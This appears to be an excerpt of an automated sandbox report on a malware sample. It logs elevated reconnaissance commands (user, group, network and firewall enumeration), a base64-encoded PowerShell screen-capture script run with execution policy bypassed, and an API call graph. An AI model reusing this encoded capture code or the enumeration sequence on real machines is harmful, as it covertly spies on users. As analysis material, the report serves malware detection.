Path: C:\Windows\System32\net1.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\net1 user
Imagebase: 0x7ff66aa70000
File size: 183'808 bytes
MD5 hash: 55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 20:53:07
Start date: 31/12/2024
Path: C:\Windows\System32\query.exe
Wow64 process (32bit): false
Commandline: query user
Imagebase: 0x7ff61a530000
File size: 17'408 bytes
MD5 hash: 29043BC0B0F99EAFF36CAD35CBEE8D45
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7a6ca0000
                                                                                                                                                                                                                                                          File size:25'600 bytes
                                                                                                                                                                                                                                                          MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                                          Start time:20:53:07
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                          Start time:20:53:08
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff66aa70000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                          Start time:20:53:09
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user administrator
                                                                                                                                                                                                                                                          Imagebase:0x7ff6f83b0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:20:53:09
Start date:31/12/2024
Path:C:\Windows\System32\net1.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\net1 user administrator
Imagebase:0x7ff66aa70000
File size:183'808 bytes
MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:20:53:09
Start date:31/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic startup get caption,command
Imagebase:0x7ff70bb60000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:20:53:09
Start date:31/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /svc
Imagebase:0x7ff786440000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):false
Commandline:ipconfig /all
Imagebase:0x7ff670f20000
File size:35'840 bytes
MD5 hash:62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):false
Commandline:route print
Imagebase:0x7ff691b20000
File size:24'576 bytes
MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\ARP.EXE
Wow64 process (32bit):false
Commandline:arp -a
Imagebase:0x7ff6619b0000
File size:26'624 bytes
MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit):false
Commandline:netstat -ano
Imagebase:0x7ff719ff0000
File size:39'936 bytes
MD5 hash:7FDDD6681EA81CE26E64452336F479E6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc query type= service state= all
Imagebase:0x7ff77f1a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show state
Imagebase:0x7ff633c30000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:20:53:10
Start date:31/12/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh firewall show config
Imagebase:0x7ff633c30000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                          Target ID:64
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:65
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:66
                                                                                                                                                                                                                                                          Start time:20:53:11
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:67
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:68
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:69
                                                                                                                                                                                                                                                          Start time:20:53:12
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
IAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:20:53:13
Start date:31/12/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
Imagebase:0x7ff6c61c0000
File size:2'759'232 bytes
MD5 hash:F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:20:53:13
Start date:31/12/2024
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
Imagebase:0x7ff6630c0000
File size:52'744 bytes
MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                                          Start time:20:53:17
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true


Execution Graph

Execution Coverage: 10.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 19.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 62
16077->16078 16079 7ff6404e86b0 2 API calls 16078->16079 16080 7ff6404e7e39 GetEnvironmentVariableW 16079->16080 16081 7ff6404e7ea2 16080->16081 16082 7ff6404e7e56 ExpandEnvironmentStringsW 16080->16082 16083 7ff6404eb870 _log10_special 8 API calls 16081->16083 16082->16081 16084 7ff6404e7e78 16082->16084 16086 7ff6404e7eb4 16083->16086 16085 7ff6404e8760 2 API calls 16084->16085 16087 7ff6404e7e8a 16085->16087 16086->15879 16088 7ff6404eb870 _log10_special 8 API calls 16087->16088 16089 7ff6404e7e9a 16088->16089 16089->15879 16091 7ff6404e86b0 2 API calls 16090->16091 16092 7ff6404e7f94 16091->16092 17025 7ff6404f7548 16092->17025 16094 7ff6404e7fa6 __std_exception_destroy 16094->15895 16096 7ff6404e1c15 16095->16096 16097 7ff6404f3ca4 49 API calls 16096->16097 16098 7ff6404e1c38 16097->16098 16098->15911 16098->15912 16100 7ff6404e8415 16099->16100 17043 7ff6404e7b50 GetCurrentProcess OpenProcessToken 16100->17043 16103 7ff6404e7b50 7 API calls 16104 7ff6404e8441 16103->16104 16105 7ff6404e8474 16104->16105 16106 7ff6404e845a 16104->16106 16108 7ff6404e2590 48 API calls 16105->16108 16107 7ff6404e2590 48 API calls 16106->16107 16109 7ff6404e8472 16107->16109 16110 7ff6404e8487 LocalFree LocalFree 16108->16110 16109->16110 16111 7ff6404e84a3 16110->16111 16113 7ff6404e84af 16110->16113 17053 7ff6404e2940 16111->17053 16114 7ff6404eb870 _log10_special 8 API calls 16113->16114 16151 7ff6404e86d2 MultiByteToWideChar 16150->16151 16154 7ff6404e86f6 16150->16154 16152 7ff6404e870c __std_exception_destroy 16151->16152 16151->16154 16152->15907 16153 7ff6404e8713 MultiByteToWideChar 16153->16152 16154->16152 16154->16153 16156 7ff6404e6575 16155->16156 16157 7ff6404e38d5 16156->16157 16158 7ff6404e2760 53 API calls 16156->16158 16159 7ff6404e6b00 16157->16159 16158->16157 16160 7ff6404e6b30 16159->16160 16173 7ff6404e6b4a __std_exception_destroy 16159->16173 16160->16173 17337 7ff6404e1440 16160->17337 16162 7ff6404e6b54 16163 7ff6404e3fe0 49 API calls 16162->16163 
